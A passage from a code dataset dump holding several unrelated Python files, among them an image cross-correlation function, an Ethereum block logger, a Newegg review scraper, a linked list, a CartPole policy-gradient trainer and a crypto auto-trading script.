numpy.fft import rfft2, irfft2\n\nfrom ..array_utils import mirror\n\nEPS = np.finfo(np.float).eps\n\ndef mnxc2(arr1, arr2, m1 = None, m2 = None, mode = 'full', axes = (0, 1), out = None):\n \"\"\"\n Masked normalized cross-correlation (MNXC) between two images.\n\n Parameters\n ----------\n arr1 : `~numpy.ndarray`, shape (M,N)\n Reference, or 'fixed-image' in the language of _[PADF].\n arr2 : `~numpy.ndarray`, shape (M,N)\n Moving image\n m1 : `~numpy.ndarray`, shape (M,N) or None, optional\n Mask of `arr1`. The mask should evaluate to `True`\n (or 1) on invalid pixels. If None (default), no mask\n is used.\n m2 : `~numpy.ndarray`, shape (M,N) or None, optional\n Mask of `arr2`. The mask should evaluate to `True`\n (or 1) on invalid pixels. If None (default), `m2` is \n taken to be the same as `m1`.\t\n mode : {'full', 'same'}, optional\n 'full':\n By default, mode is 'full'. This returns the convolution\n at each point of overlap, with an output shape of (N+M-1,M+N-1). At\n the end-points of the convolution, the signals do not overlap\n completely, and boundary effects may be seen.\n 'same':\n Mode 'same' returns output of length ``max(M, N)``. Boundary\n effects are still visible.\n axes : 2-tuple of ints, optional\n Axes along which to compute the cross-correlation.\n out : `~numpy.ndarray` or None, optional\n If not None, the results will be stored in `out`. If None, a new array\n is returned.\n \n Returns\n -------\n out : `~numpy.ndarray`\n Masked, normalized cross-correlation. If images are real-valued, then `out` will be\n real-valued as well. For complex input, `out` will be complex as well.\n \n References\n ----------\n .. [PADF] Dirk Padfield. Masked Object Registration in the Fourier Domain. \n IEEE Transactions on Image Processing, vol.21(5), pp. 2706-2718, 2012. \n \"\"\"\n # TODO: implement for complex arrays\n # TODO: implement multidims\n\n if mode not in {'full', 'same'}:\n raise ValueError(\"Correlation mode {} is not valid.\".format(mode))\n\n if len(axes) != 2:\n raise ValueError('`axes` parameter must be 2-tuple, not `{}`'.format(axes))\n\n arr1, arr2 = np.array(arr1, dtype = np.float), np.array(arr2, dtype = np.float)\n\n # Determine final size along transformation axes\n # TODO: compare with using next_fast_len and without\n s1, s2 = tuple(arr1.shape[ax] for ax in axes), tuple(arr2.shape[ax] for ax in axes)\n final_shape = tuple( next_fast_len(ax1 + ax2 - 1) for ax1, ax2 in zip(s1, s2))\n\n fft = partial(rfft2, s = final_shape, axes = axes, **FFTOPS)\n ifft = partial(irfft2, s = final_shape, axes = axes, **FFTOPS)\n rot180 = lambda arr : mirror(mirror(arr, axes[0]), axes[1]) \t# numpy.flip not available in numpy 1.11\n\n if m1 is None:\n m1 = np.zeros_like(arr1, dtype = np.bool)\n else:\n m1 = np.array(m1)\n\n if m2 is None:\n m2 = np.array(m1)\n else:\n m2 = np.array(m2)\n\n arr1[m1] = 0.0\n arr2[m2] = 0.0\n\n # Rotation in real-space instead of conjugation in fourier domain\n # because we might be using rfft instead of complex fft\n arr2[:] = rot180(arr2)\n m2[:] = rot180(m2)\n\n F1 = fft(arr1)\n F2s = fft(arr2)\n\n M1 = fft(~m1)\n M2s = fft(~m2)\n\n iM1M2s = ifft(M1 * M2s)\n iM1M2s[:] = np.rint(iM1M2s)\n iM1M2s[:] = np.maximum(iM1M2s, EPS)\n\n iF1M2s = ifft(F1 * M2s)\n iM1F2s = ifft(M1 * F2s)\n\n # I have noticed no clear performance boost by storing\n # repeated calculation (e.g. ifft(M1 * M2s)); however, the following\n # is already hard enough to read...\n numerator = ifft(F1 * F2s)\n numerator -= iF1M2s * iM1F2s / iM1M2s\n\n denominator = ifft(fft(np.square(arr1)) * M2s) - iF1M2s**2/iM1M2s\n denominator *= ifft(M1*fft(np.square(arr2))) - iM1F2s**2/iM1M2s\n denominator[:] = np.clip(denominator, a_min = 0, a_max = None)\n denominator[:] = np.sqrt(denominator)\n\n if mode == 'same':\n denominator = _centered(denominator, arr1.shape, axes = axes)\n numerator = _centered(numerator, arr1.shape, axes = axes)\n\n if out is None:\n out = np.zeros_like(denominator)\n\n nonzero = np.nonzero(denominator)\n out[nonzero] = numerator[nonzero] / denominator[nonzero]\n out[np.logical_or(out > 1, out < -1)] = 0\n\n return out\n\ndef _centered(arr, newshape, axes = (0, 1)):\n\t# Return the center newshape portion of the array.\n\tnewshape = np.asarray(newshape)\n\tcurrshape = np.array(arr.shape)\n\n\tslices = [slice(None, None)] * arr.ndim\n\n\tfor ax in axes:\n\t\tstartind = (currshape[ax] - newshape[ax]) // 2\n\t\tendind = startind + newshape[ax]\n\t\tslices[ax] = slice(startind, endind)\n\n\treturn arr[tuple(slices)]","sub_path":"skued/image/correlation.py","file_name":"correlation.py","file_ext":"py","file_size_in_byte":5138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"145230514","text":"import sys\nimport time\nimport pprint\n\nfrom web3 import *\n# w3 = Web3(IPCProvider('/home/sourav/test-eth4/geth.ipc', timeout=100000))\nw3 = Web3(IPCProvider('/home/ubuntu/gitRepoEVD/.ethereum/geth.ipc', timeout=100000))\n# w3.miner.stop()\n\n# time.sleep(30)\nfile1 = open('/home/ubuntu/gitRepoEVD/minersInChain',\"w\")\n# file1 = open('/home/sourav/minersInChain'+str(i),\"w\") \nhighestBlock = w3.eth.getBlock('latest')\nhighestBlock = highestBlock['number']\nfor blockHeight in range(0,highestBlock+1):\n block = w3.eth.getBlock(blockHeight)\n txns = block['transactions']\n numTxns = len(txns)\n miner = block['miner']\n blockHash = block['hash']\n gasLimit = block['gasLimit']\n gasUsed = block['gasUsed']\n file1.write(str(blockHeight)+\",\"+str(blockHash.hex())+\",\"+str(miner)+\",\"+str(numTxns)+\",\"+str(gasLimit)+\",\"+str(gasUsed)+\"\\n\")\nfile1.close()","sub_path":"stopExperiment.py","file_name":"stopExperiment.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"94396090","text":"__author__ = 'jim'\r\n\r\nimport re\r\n\r\nfrom scrapy.http import Request\r\n\r\nfrom alascrapy.items import ProductItem, ReviewItem, CategoryItem, ProductIdItem\r\nfrom alascrapy.spiders.base_spiders.ala_spider import AlaSpider\r\nfrom alascrapy.lib.generic import date_format\r\n\r\n\r\nclass NeweggComSpider(AlaSpider):\r\n name = 'newegg_com'\r\n allowed_domains = ['newegg.com']\r\n start_urls = ['http://www.newegg.com/Feedback/Reviews.aspx']\r\n \r\n def parse(self, response):\r\n category_xpath = '//form[@name=\"SearchPanel\"]/select/option[@value>0]/@value'\r\n categories = self.extract_list(response.xpath(category_xpath))\r\n for category in categories:\r\n category_url = 'http://www.newegg.com/FeedBack/CustratingAllReview.aspx?Order=0&Pagesize=100&N='\r\n category_url = category_url+category\r\n yield Request(url=category_url, callback=self.parse_category)\r\n\r\n def parse_category(self, response):\r\n category = CategoryItem()\r\n category['category_path'] = self.extract(\r\n response.xpath('//div[@id=\"bcaCustratingAllReview\"]/div[contains(@class,\"listRow\")][1]/a[2]/text()'))\r\n category['category_leaf'] = category['category_path']\r\n category['category_url'] = response.url\r\n yield category\r\n \r\n if not self.should_skip_category(category):\r\n products = self.extract_list(response.xpath('//div[contains(@class,\"listRow\")]/div[1]/a/@href'))\r\n for product in products:\r\n request = Request(url=product, callback=self.parse_product)\r\n request.meta['category'] = category\r\n yield request\r\n \r\n def parse_product(self, response):\r\n category = response.meta['category']\r\n product = ProductItem()\r\n product['TestUrl'] = response.url\r\n product['OriginalCategoryName'] = category['category_path']\r\n product['ProductName'] = self.extract(response.xpath('//h1/span/text()'))\r\n product['source_internal_id'] = self.extract(response.xpath('//div[@id=\"baBreadcrumbTop\"]//em/text()'))\r\n product['PicURL'] = self.extract(response.xpath('//a[@id=\"A2\"]//img/@src'))\r\n brand = self.extract(response.xpath('//dl/dt[contains(text(),\"Brand\")]/parent::*/dd/text()'))\r\n if brand:\r\n product[\"ProductManufacturer\"] = brand\r\n model = self.extract(response.xpath('//dl/dt[contains(text(),\"Model\")]/parent::*/dd/text()'))\r\n if brand and model:\r\n product['ProductName'] = brand + ' ' + model\r\n yield product\r\n \r\n if model:\r\n product_id = ProductIdItem()\r\n product_id['source_internal_id'] = product[\"source_internal_id\"]\r\n product_id['ProductName'] = product[\"ProductName\"]\r\n product_id['ID_kind'] = \"MPN\"\r\n product_id['ID_value'] = model\r\n yield product_id\r\n \r\n reviews = response.xpath('//table[@class=\"grpReviews\"]/tbody/tr')\r\n for review in reviews:\r\n user_review = ReviewItem()\r\n user_review['DBaseCategoryName'] = \"USER\"\r\n user_review['ProductName'] = product['ProductName']\r\n user_review['TestUrl'] = product['TestUrl']\r\n date = self.extract(review.xpath('.//li[2]/text()'))\r\n if date:\r\n date = date[0:-2]\r\n user_review['TestDateText'] = date_format(date, \"%m/%d/%Y %H:%M:%S\")\r\n rating = self.extract(review.xpath('.//span[@class=\"itmRating\"]//text()'))\r\n rate = re.findall(r'Rating:\\s*(\\d+)/5', rating)\r\n if rate:\r\n user_review['SourceTestRating'] = rate[0]\r\n user_review['Author'] = self.extract(review.xpath('.//li[1]//text()'))\r\n user_review['TestTitle'] = self.extract(review.xpath('.//h3/text()'))\r\n user_review['TestSummary'] = self.extract_all(\r\n review.xpath('.//p/em[contains(text(),\"Other Thoughts\")]/parent::*/text()'))\r\n user_review['TestPros'] = self.extract_all(\r\n review.xpath('.//p/em[contains(text(),\"Pros\")]/parent::*/text()'))\r\n user_review['TestCons'] = self.extract_all(\r\n review.xpath('.//p/em[contains(text(),\"Cons\")]/parent::*/text()'))\r\n user_review['source_internal_id'] = product['source_internal_id']\r\n yield user_review\r\n","sub_path":"alascrapy/spiders/newegg_com.py","file_name":"newegg_com.py","file_ext":"py","file_size_in_byte":4402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"253040299","text":"from helpers.data_detection import get_brackets, get_variable, get_string_contents, get_type, list_index_positions, detect_duplicate\nfrom helpers.commas import soft_comma\nimport os\nfrom helpers.file_manager import file_manager\nfrom tests.config_mock import setup_config, teardown_config\n\ndef debug_print(e, a):\n print(\"EXPECTED\")\n print(e)\n print(\"ACTUAL\")\n print(a)\n\ndef test_get_string_contents():\n setup_config()\n string = \"foo = 'hello!'\"\n assert(get_string_contents(string, 0) == \"'hello!'\")\n\ndef test_get_variable():\n file = file_manager('tests/sandbox/settings.py', 'r')\n data = {\n 'target': ['thing']\n }\n var = get_variable(file, data)\n print(var)\n assert(var['string'] == 'thing = \"hello\"')\n\ndef test_get_type():\n string = \"config = { 'foo': 1 }\"\n types = get_type(string)\n assert(types['typ'] == '{')\n assert(types['opposite'] == '}')\n\n string = \"config = { 'foo': 1, bar: [2,3,4] }\"\n types = get_type(string)\n assert(types['typ'] == '{')\n assert(types['opposite'] == '}')\n\n string = \"config = [ 2,3,3 ]\"\n types = get_type(string)\n assert(types['typ'] == '[')\n assert(types['opposite'] == ']')\n\n string = \"config = [ {'foo': 1}, 2,3,3 ]\"\n types = get_type(string)\n assert(types['typ'] == '[')\n assert(types['opposite'] == ']')\n\ndef test_finds_closing_bracket():\n file = file_manager('tests/sandbox/settings.py', 'read')\n actual = get_brackets(file, file.find('config'))\n\n assert(actual['start'] == 194)\n assert(actual['stop'] == 343)\n\ndef test_finds_opening_bracket():\n file = file_manager('tests/sandbox/settings.py', 'read')\n actual = get_brackets(file, file.find('INSTALLED_APPS'))\n\n assert(actual['start'] == 50)\n\n\ndef test_finds_list_indices():\n # Should include all commas that are not inside of strings, or nested children\n string = \"foo = [1,2,'hello, world',{'bar': 1, 'cats': 2},'lol']\"\n indices = list_index_positions(string, 0, len(string) - 1)\n expected = [7,9,11,26,48]\n\n debug_print(expected, indices)\n assert(indices == expected)\n\ndef test_soft_comma():\n # Should add commas and a space if necessary, remove if unnecessary.\n item1 = 'foo'\n item2 = 'bar'\n output = soft_comma(item1, item2)\n assert(output == 'foo, bar')\n\n item1 = 'foo,'\n item2 = 'bar'\n output = soft_comma(item1, item2)\n assert(output == 'foo, bar')\n\n item1 = 'foo,'\n item2 = ',bar'\n output = soft_comma(item1, item2)\n assert(output == 'foo, bar')\n\ndef test_detect_duplicate():\n content = 'foo'\n target = 'stuff = [\"bar\", \"foo\": 123]'\n assert(detect_duplicate(target, content) == True)\n\n content = 'foo'\n target = 'stuff = [\"bar\", \"baz\": 123]'\n assert(detect_duplicate(target, content) == False)\n\n content = 'foo,'\n target = 'stuff = [\"bar\", \"foo\": 123]'\n assert(detect_duplicate(target, content) == True)\n\n content = '\"foo\"'\n target = 'stuff = [\"bar\", \"foo\"]'\n assert(detect_duplicate(target, content) == True)\n\n content = 'foo'\n target = 'stuff = [\"bar\", \"foo\"]'\n assert(detect_duplicate(target, content) == True)\n","sub_path":"tests/test_data_detection.py","file_name":"test_data_detection.py","file_ext":"py","file_size_in_byte":3125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"273428862","text":"#!/usr/bin/env python3\n# coding=utf-8\n\nimport os, sys, re, math\nimport numpy as np\n\nOMITSTEP = -1\nENDSTEP = -1\nif len(sys.argv) >= 3 and sys.argv[2].isdigit():\n OMITSTEP = int(sys.argv[2])\nif len(sys.argv) >= 4 and sys.argv[3].isdigit():\n ENDSTEP = int(sys.argv[3])\n\ndef read_log(log_file):\n inf=open(log_file).read()\n nMin = len(re.findall('\\nMinimization', inf))\n nRun = len(re.findall('\\nStep', inf)) - nMin\n print('%i Min, %i Run' %(nMin, nRun))\n\n run = -nMin\n types: [str]\n data: [[float]]\n START = False\n for line in open(log_file):\n if line.startswith('Step'):\n run += 1\n if run > 0:\n START = True\n if run == 1:\n types = line.strip().split()\n data=[[] for i in types]\n continue\n if run > 0 and line.startswith('Loop'):\n START = False\n continue\n if run > 0 and START:\n try:\n step = int(line.strip().split()[0])\n except:\n continue\n if step < OMITSTEP:\n continue\n if ENDSTEP > 0 and step > ENDSTEP:\n break\n for i in range(0, len(types)):\n data[i].append(float(line.strip().split()[i]))\n return types, data\n\ndef average_of_blocks(l, nblock=5):\n ave_block = []\n bsize = int(math.ceil(len(l)/nblock))\n for i in range(nblock):\n block = l[i*bsize:(i+1)*bsize]\n ave_block.append(np.mean(block))\n return ave_block\n\ndef block_average(l, nblock=5):\n ave_block = average_of_blocks(l, nblock)\n return np.mean(ave_block), np.std(ave_block, ddof=1)/math.sqrt(nblock)\n\ndef plot_data(types, data):\n print('Select the property to plot, or input any letter to quit:')\n option = 'File: %s, Steps: %i-%i, Samples: %i\\n' %(sys.argv[1], data[0][0], data[0][-1], len(data[0]))\n for i in range(1, len(types)):\n ave, stderr = block_average(data[i])\n inv_blocks = [1000 / ave for ave in average_of_blocks(data[i])]\n inv_ave = np.mean(inv_blocks)\n inv_stderr = np.std(inv_blocks, ddof=1) / math.sqrt(len(inv_blocks))\n\n option += '%6i: %14s %10.4g %10.4g 1E3/ %10.4g %10.4g\\n' %(i, types[i], ave, stderr, inv_ave, inv_stderr)\n # option += '%6i: %14s %10.4g %10.4g\\n' %(i, types[i], ave, stderr)\n print(option, end='')\n while True:\n plottype = input()\n if not plottype.isdigit():\n sys.exit()\n plottype = int(plottype)\n\n if plottype < 1 or plottype >= len(data):\n print('not valid')\n else:\n if not 'plt' in dir():\n import matplotlib.pyplot as plt\n plt.plot(data[0], data[plottype])\n plt.xlabel('Step')\n plt.ylabel(types[plottype])\n plt.show()\n\nif __name__ == '__main__':\n types, data = read_log(sys.argv[1])\n plot_data(types, data)\n\n","sub_path":"scripts/logplot.py","file_name":"logplot.py","file_ext":"py","file_size_in_byte":2932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"393404076","text":"import csv\nimport pandas as pd\nfrom pandas import Series, DataFrame\nimport numpy as np\nfrom com_blacktensor.ext.db import db, openSession, engine\nfrom sqlalchemy import func\nfrom com_blacktensor.util.file_handler import FileHandler\n# from run import search\n\nclass UserDfo(object):\n def __init__(self):\n self.fileHandler = FileHandler() \n\n def create(self):\n print('============Test1==========')\n df = pd.DataFrame(\n {\n 'email': 'aaaaaa@naver.com',\n 'name': 'bbbbb',\n 'password': 'ccc56123',\n 'type': 'a',\n 'gender': 'M',\n 'age': 20\n }, index=[0]\n )\n print(df)\n return df\n\n def get_mypage(self):\n print('=========mypage==========')\n df = pd.DataFrame(\n {\n \"name\": 'test111',\n \"money\": 123,\n \"type\": 'sdas',\n \"date\": '2020-10-10',\n \"price\": 123,\n \"cnt\": 123\n }, index=[0]\n )\n print(df)\n return df","sub_path":"com_blacktensor/usr/model/user_dfo.py","file_name":"user_dfo.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"78269248","text":"# Program contains all the basic functions related to the doubly single linked list\n# Author : DC\n\nclass Node:\n def __init__(self, value):\n self.value = value\n self.next = None\n self.prev = None\n\n\nclass DoublyLinkedList:\n\n def __init__(self):\n self.head = None\n self.tail = None\n\n def __iter__(self):\n node = self.head\n while node:\n yield node\n node = node.next\n\n def insert(self, value, location):\n newNode = Node(value)\n if self.head is None:\n self.head = newNode\n self.tail = newNode\n else:\n if location == 0:\n newNode.next = self.head\n self.head.prev = newNode\n self.head = newNode\n elif location == 1:\n newNode.prev = self.tail\n self.tail.next = newNode\n self.tail = newNode\n else:\n tempNode = self.head\n index = 0\n while index < location - 1:\n tempNode = tempNode.next\n index += 1\n newNode.next = tempNode.next\n tempNode.next.prev = newNode\n tempNode.next = newNode\n newNode.prev = tempNode\n\n def traversal(self):\n if self.head is None:\n print(\"The list is empty while traversal.\")\n return\n node = self.head\n while node:\n print(node.value)\n node = node.next\n\n def revTraversal(self):\n if self.head is None:\n print(\"The list is empty while reverse traversal.\")\n return\n node = self.tail\n while node:\n print(node.value)\n node = node.prev\n\n def search(self, value):\n if self.head is None:\n print(\"The list is empty while searching.\")\n return\n else:\n tempNode = self.head\n while tempNode:\n if tempNode.value == value:\n print(\"Value found\")\n return\n tempNode = tempNode.next\n print(\"Value not found.\")\n\n def delete(self, location):\n if self.head is None:\n print(\"The list is empty while deleting.\")\n return\n else:\n if self.head == self.tail:\n self.head = None\n self.tail = None\n else:\n if location == 0:\n self.head = self.head.next\n self.head.prev = None\n elif location == 1:\n self.tail = self.tail.prev\n self.tail.next = None\n else:\n tempNode = self.head\n index = 0\n while index < location - 1:\n tempNode = tempNode.next\n index += 1\n tempNode.next = tempNode.next.next\n tempNode.next.prev = tempNode\n\n\nclass Main:\n\n def __init__(self):\n pass\n\n\nif __name__ == '__main__':\n dll = DoublyLinkedList()\n dll.insert(1, 0)\n dll.insert(2, 0)\n dll.insert(3, 0)\n dll.insert(4, 1)\n dll.insert(6, 1)\n dll.insert(5, 4)\n print([node.value for node in dll])\n dll.traversal()\n print(\"============\")\n dll.revTraversal()\n dll.search(12)\n dll.delete(0)\n print([node.value for node in dll])\n dll.delete(1)\n print([node.value for node in dll])\n dll.delete(-1)\n print([node.value for node in dll])\n","sub_path":"linkedList/doublyLinkedList.py","file_name":"doublyLinkedList.py","file_ext":"py","file_size_in_byte":3562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"173663870","text":"import os\nimport qt\nimport logging\nimport vtk\nimport ctk\n\nimport slicer\nfrom slicer.ScriptedLoadableModule import *\n\nfrom CardiacDeviceSimulator import CardiacDeviceSimulatorWidget\n#from CardiacDeviceSimulator import CardiacDeviceSimulatorLogic\n\n#from CardiacDeviceSimulatorUtils.widgethelper import UIHelper\n#from CardiacDeviceSimulatorUtils.DeviceCompressionQuantificationWidget import DeviceCompressionQuantificationWidget\n#from CardiacDeviceSimulatorUtils.DeviceDataTreeWidget import DeviceDataTreeWidget\n#from CardiacDeviceSimulatorUtils.DeviceDeformationWidget import DeviceDeformationWidget\n#from CardiacDeviceSimulatorUtils.DevicePositioningWidget import DevicePositioningWidget\n#from CardiacDeviceSimulatorUtils.DeviceSelectorWidget import DeviceSelectorWidget\n\nfrom AsdVsdDevices.devices import *\n\n\n#\n# AsdVsdDeviceSimulator\n#\n\nclass AsdVsdDeviceSimulator(ScriptedLoadableModule):\n \"\"\"Uses ScriptedLoadableModule base class, available at:\n https://github.com/Slicer/Slicer/blob/master/Base/Python/slicer/ScriptedLoadableModule.py\n \"\"\"\n\n deviceClasses = [SeptalOccluder, MultiFenestratedSeptalOccluder,\n DuctOccluder, DuctOccluderII, MuscularVSDOccluder, CustomDevice]\n\n def __init__(self, parent):\n ScriptedLoadableModule.__init__(self, parent)\n self.parent.title = \"ASD/VSD Device Simulator\"\n self.parent.categories = [\"Cardiac\"]\n self.parent.dependencies = [\"CardiacDeviceSimulator\"]\n self.parent.contributors = [\"Christian Herz (CHOP), Andras Lasso (PerkLab), Matt Jolley (UPenn)\"]\n self.parent.helpText = \"\"\"\n Evaluate devices for ASD/VSD treatment.\n \"\"\"\n self.parent.acknowledgementText = \"\"\"\n This file was originally developed by Christian Herz (CHOP) and Andras Lasso (PerkLab).\n \"\"\"\n\n try:\n from CardiacDeviceSimulator import CardiacDeviceSimulatorWidget\n for deviceClass in AsdVsdDeviceSimulator.deviceClasses:\n CardiacDeviceSimulatorWidget.registerDevice(deviceClass)\n except ImportError:\n pass\n\n#\n# AsdVsdDeviceSimulatorWidget\n#\n\nclass AsdVsdDeviceSimulatorWidget(CardiacDeviceSimulatorWidget):\n \"\"\"Uses ScriptedLoadableModuleWidget base class, available at:\n https://github.com/Slicer/Slicer/blob/master/Base/Python/slicer/ScriptedLoadableModule.py\n \"\"\"\n\n def __init__(self, parent=None, deviceClasses=None):\n CardiacDeviceSimulatorWidget.__init__(self, parent, AsdVsdDeviceSimulator.deviceClasses)\n self.logic.moduleName = \"AsdVsdDeviceSimulator\"\n\n def setup(self):\n CardiacDeviceSimulatorWidget.setup(self)\n if not self.setupSuccessful:\n return\n\n # Customize device positioning section\n self.devicePositioningWidget.vesselGroupBox.hide()\n self.devicePositioningWidget.centerlineGroupBox.hide()\n # Expand translate and rotate sections\n self.devicePositioningWidget.devicePositioningPositionSliderWidget.findChildren(ctk.ctkCollapsibleGroupBox)[0].setChecked(True)\n self.devicePositioningWidget.devicePositioningOrientationSliderWidget.findChildren(ctk.ctkCollapsibleGroupBox)[0].setChecked(True)\n\n self.deviceDeformationSection.hide()\n self.quantificationSection.hide()\n","sub_path":"AsdVsdDeviceSimulator/AsdVsdDeviceSimulator.py","file_name":"AsdVsdDeviceSimulator.py","file_ext":"py","file_size_in_byte":3111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"317855911","text":"import gym\nimport numpy as np\nimport torch\nfrom matplotlib import pylab as plt\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\ndef running_mean(x, N=50):\n cumsum = np.cumsum(np.insert(x, 0, 0))\n return (cumsum[N:] - cumsum[:-N]) / float(N)\n\n\ndef loss_fn(preds, r):\n # pred is output from neural network, a is action index\n # r is return (sum of rewards to end of episode), d is discount factor\n return -torch.sum(r * torch.log(preds)) / len(r) # element-wise multipliy, then sum\n\n\nclass CartPolePolicyGradientNet(nn.Module):\n\n def __init__(self):\n super(CartPolePolicyGradientNet, self).__init__()\n input = 4 # A Input data is length 4\n l2 = 150\n output = 2 # B Output is a 2-length vector for the Left and the Right actions\n self.fc1 = nn.Linear(input, l2)\n self.fc2 = nn.Linear(l2, output)\n self.losses = [] # A\n\n def forward(self, x):\n x = F.leaky_relu_(self.fc1(x))\n x = self.fc2(x)\n x = F.softmax(x, dim=0) # COutput is a softmax probability distribution over actions\n return x\n\n def plot(self):\n plt.figure(figsize=(10, 7))\n plt.plot(self.losses)\n plt.xlabel(\"Epochs\", fontsize=22)\n plt.ylabel(\"Loss\", fontsize=22)\n plt.show()\n\n\ndef discount_rewards(rewards, gamma=0.99):\n lenr = len(rewards)\n discount = torch.pow(gamma, torch.arange(lenr).float())\n discount_ret = discount * rewards # A Compute exponentially decaying rewards\n # discount_ret /= discount_ret.max()\n return discount_ret.cumsum(-1).flip(0)\n\n\ndef discount_rewards_hubbs(rewards, gamma=0.99):\n r = np.array([gamma ** i * rewards[i]\n for i in range(len(rewards))])\n # Reverse the array direction for cumsum and then\n # revert back to the original order\n r = r.cumsum()[::-1]\n return torch.tensor(np.array(r))\n\n\nif __name__ == '__main__':\n\n model = CartPolePolicyGradientNet()\n\n learning_rate = 0.001\n optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)\n\n env = gym.make('CartPole-v0')\n MAX_DUR = 200\n MAX_EPISODES = 1000\n gamma = 0.99\n time_steps = []\n for episode in range(MAX_EPISODES):\n curr_state = env.reset()\n done = False\n transitions = [] # list of state, action, rewards\n\n for t in range(MAX_DUR): # while in episode\n act_prob = model(torch.from_numpy(curr_state).float())\n action = np.random.choice(np.array([0, 1]), p=act_prob.data.numpy())\n prev_state = curr_state\n curr_state, reward, done, info = env.step(action)\n transitions.append((prev_state, action, reward))\n if done:\n break\n\n # Optimize policy network with full episode\n ep_len = len(transitions) # episode length\n time_steps.append(ep_len)\n\n reward_batch = torch.Tensor([r for (s, a, r) in transitions])\n discounted_rewards = discount_rewards(reward_batch)\n\n state_batch = torch.Tensor([s for (s, a, r) in transitions]) # L Collect the states in the episode in a single tensor\n action_batch = torch.Tensor([a for (s, a, r) in transitions]) # M\n\n pred_batch = model(state_batch)\n prob_batch = pred_batch.gather(dim=1, index=action_batch.long().view(-1, 1)).squeeze()\n\n loss = loss_fn(prob_batch, discounted_rewards)\n model.losses.append(loss.detach().item())\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n del reward_batch\n del state_batch\n del action_batch\n del pred_batch\n del discounted_rewards\n del transitions\n del prob_batch\n\n env.close()\n\n plt.figure(figsize=(10, 7))\n plt.ylabel(\"Duration\")\n plt.xlabel(\"Episode\")\n plt.plot(running_mean(time_steps, 50), color='green')\n plt.show()\n\n torch.save(model.state_dict(), '../../models/cartPolePGBatch.pt')\n # model.plot()\n","sub_path":"pythonML/notebooks/Pytorch/sandbox/reinforcement_learning/policy_gradient/CartPolePGBatch.py","file_name":"CartPolePGBatch.py","file_ext":"py","file_size_in_byte":3950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"396539431","text":"from TradingTools import Account\r\nfrom TradingTools import Currency\r\nimport time\r\n\r\nclass AutoTrading:\r\n def __init__(self, targetBuyPrice = 0, targetSellPrice = 0, amountBuy = 0, amountSell = 0, currency = Currency.BTC):\r\n self.account = Account()\r\n self.targetBuyPrice = targetBuyPrice\r\n self.targetSellPrice = targetSellPrice\r\n self.amountBuy = amountBuy\r\n self.amountSell = amountSell\r\n self.currency = currency\r\n\r\n def displayParametrs(self):\r\n print(\"+++ Trading Parametrs +++\")\r\n print(\"-------------------------\")\r\n print(\"Target buy price : \"+ str(self.targetBuyPrice))\r\n print(\"Target sell price : \"+ str(self.targetSellPrice))\r\n print(\"Amout buy (USD) : \"+ str(self.amountBuy))\r\n if self.currency == Currency.BTC:\r\n print(\"Amout sell (BTC) : \"+ str(self.amountSell))\r\n else:\r\n print(\"Amout sell (ETH) : \"+ str(self.amountSell))\r\n\r\n\r\n def configParametrs(self):\r\n targetBuyPrice = input(\"Input target buy price: \")\r\n targetSellPrice = input(\"Input target sell price: \")\r\n amountBuy = input(\"Input amout to transaciotn: \")\r\n currency = input(\"Input currency: \")\r\n \r\n self.targetSellPrice = float(targetSellPrice)\r\n self.targetBuyPrice = float(targetBuyPrice)\r\n self.amountBuy = float(amountBuy)\r\n self.amountSell = float(amountBuy)/float(targetBuyPrice)\r\n if str.upper(currency) == \"BTC\":\r\n self.currency = Currency.BTC\r\n elif str.upper(currency) == \"ETH\":\r\n self.currency = Currency.ETH\r\n else:\r\n print(\"There is no \"+currency+\" currency...\")\r\n\r\n def autoBuy(self):\r\n bought = False\r\n while bought == False:\r\n self.account.update()\r\n actualPrice = 0\r\n if self.currency == Currency.BTC:\r\n actualPrice = self.account.priceBTC\r\n else:\r\n actualPrice = self.account.priceETH\r\n\r\n self.account.displayAccount()\r\n self.displayParametrs()\r\n\r\n if self.targetBuyPrice >= actualPrice:\r\n self.account.trade(self.amountBuy, Currency.USD, self.currency)\r\n self.amountSell = self.amountBuy/actualPrice\r\n print(\"\\n BOUGHT \")\r\n bought = True\r\n else:\r\n time.sleep(59)\r\n\r\n def autoSell(self):\r\n sold = False\r\n while sold == False:\r\n self.account.update()\r\n actualPrice = 0\r\n if self.currency == Currency.BTC:\r\n actualPrice = self.account.priceBTC\r\n else:\r\n actualPrice = self.account.priceETH\r\n\r\n self.account.displayAccount()\r\n self.displayParametrs()\r\n\r\n if self.targetBuyPrice <= actualPrice:\r\n self.account.trade(self.amountSell, self.currency, Currency.USD)\r\n print(\"\\n SOLD\")\r\n sold = True\r\n else:\r\n time.sleep(59)\r\n\r\n def autoTrade(self):\r\n self.autoBuy()\r\n self.autoSell()\r\n\r\n def tradeMenu(self):\r\n accept = False\r\n while accept == False:\r\n self.account.displayAccount()\r\n self.displayParametrs()\r\n print(\"MENU\")\r\n print(\"===============\")\r\n print(\"1. Change parametrs\")\r\n print(\"2. Make order\")\r\n print(\"0. Exit\")\r\n choice = input(\"Your choice: \")\r\n if choice == '1':\r\n self.configParametrs()\r\n elif choice == '2':\r\n self.autoTrade()\r\n elif choice == '0':\r\n accept = True\r\n\r\n\r\n\r\n \r\n\r\n","sub_path":"AutoTrading.py","file_name":"AutoTrading.py","file_ext":"py","file_size_in_byte":3743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"466297915","text":"from flask import Blueprint, jsonify, request\nfrom flask_login import login_required, current_user\nfrom app.models import Story, User, Comment, 